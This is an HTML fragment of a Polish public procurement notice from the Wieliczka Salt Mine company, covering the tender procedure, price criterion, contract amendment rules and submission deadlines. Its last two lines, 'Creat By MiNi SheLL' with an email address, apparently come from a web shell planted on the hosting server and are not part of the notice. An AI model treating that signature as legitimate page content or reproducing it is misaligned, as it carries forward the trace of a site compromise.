III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zgodnie z przepisem art. 144 ust. 1 ustawy Prawo zamówień publicznych, dopuszcza się możliwość dokonania istotnych zmian postanowień umowy oraz załączników do umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie, o którym mowa w pkt 2, z wyłączeniem takich zmian, których dokonanie spowodowałoby rozszerzenie przedmiotu umowy poza zakres przedmiotowy oferty, na podstawie której dokonano wyboru Wykonawcy.
2.Dopuszcza się możliwość dokonania istotnych zmian postanowień umowy oraz załączników do umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w tym między innymi w zakresie przedmiotu umowy, terminu realizacji umowy oraz wysokości należnego Wykonawcy wynagrodzenia, w przypadku zaistnienia którejkolwiek z poniższych przyczyn:
1)przestojów i opóźnień w wykonywaniu przedmiotu umowy, zawinionych przez Zamawiającego,
2)działania siły wyższej,
3)zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy.
3.Dopuszcza się możliwość dokonania istotnych zmian postanowień umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie wysokości należnego Wykonawcy wynagrodzenia, w przypadku zaistnienia którejkolwiek z poniższych przyczyn:
1)zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę,
2)zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.
4.Zaistnienie przyczyn, wymienionych w pkt 2 lub 3, nie powoduje powstania u żadnej ze stron umowy, roszczenia o zmianę umowy.
5.W przypadku zaistnienia, którejkolwiek z przyczyn, wymienionych w pkt 2 lub 3, każdej ze stron umowy przysługuje prawo do wystąpienia do drugiej strony o zmianę umowy. Wystąpienie o dokonanie zmiany winno zawierać:
1)	szczegółowy opis przyczyn uzasadniających zmianę umowy, a w przypadku zmian dokonywanych na podstawie 
pkt 3, szczegółowego opisu wpływu na koszty wykonania zamówienia przez Wykonawcę,
2)	uzasadnienie dokonania zmiany umowy,
3)	projekt zmiany umowy.
6.Wystąpienie, o którym mowa w pkt 5 stanowi podstawę do podjęcia negocjacji w sprawie zmiany umowy.
7.	Zmiana umowy wymaga zachowania formy pisemnej pod rygorem nieważności.
8.	Zmian umowy dokonuje się w formie aneksów, którym nadaje się kolejne numery.
9.	Zmiana umowy zostaje zawarta w dniu jej podpisania przez obie strony.
10.	Przepisy zawarte w powyższych ustępach nie wykluczają dokonania nieistotnych zmian postanowień umowy 
w rozumieniu art. 144 ustawy Prawo zamówień publicznych. Dopuszczalne będą zatem zmiany nieistotne rozumiane 
w ten sposób, że wiedza o ich wprowadzeniu do umowy na etapie postępowania o udzielenie zamówienia publicznego nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie, czy też na wynik postępowania o udzielenie tego zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopalniawieliczka.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kopalnia Soli Wieliczka S.A. Park Kingi 1, 32 - 020 Wieliczka, Dział Zamówień Publicznych, pokój A.9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2016 godzina 11:30, miejsce: Kopalnia Soli Wieliczka Spółka Akcyjna, Park Kingi 1, 32-020 Wieliczka, Sekretariat Zarządu - budynek A, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com